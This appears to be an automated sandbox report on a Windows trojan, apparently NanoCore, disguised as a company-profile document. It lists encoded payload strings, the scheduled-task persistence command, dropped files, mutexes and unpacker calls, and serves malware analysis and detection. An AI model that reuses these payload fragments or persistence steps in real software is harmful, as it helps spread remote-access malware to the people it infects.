jfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 8.2.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 8.0.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 14.2.dhcpmon.exe.960000.1.unpack, LogIn.cs	Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/12@18/1

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File created: C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_01
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Mutant created: \Sessions\1\BaseNamedObjects\HlbKKwoAS
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{06dcc34e-fccc-45c0-ab04-0a28b66d80f2}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File created: C:\Users\user\AppData\Local\Temp\tmp66DE.tmp

Jump to behavior

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File read: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe 'C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: sjZXfoyePbSa.exe.0.dr, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.7.dr, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.9a0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.dhcpmon.exe.b50000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.dhcpmon.exe.b50000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.dhcpmon.exe.960000.1.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

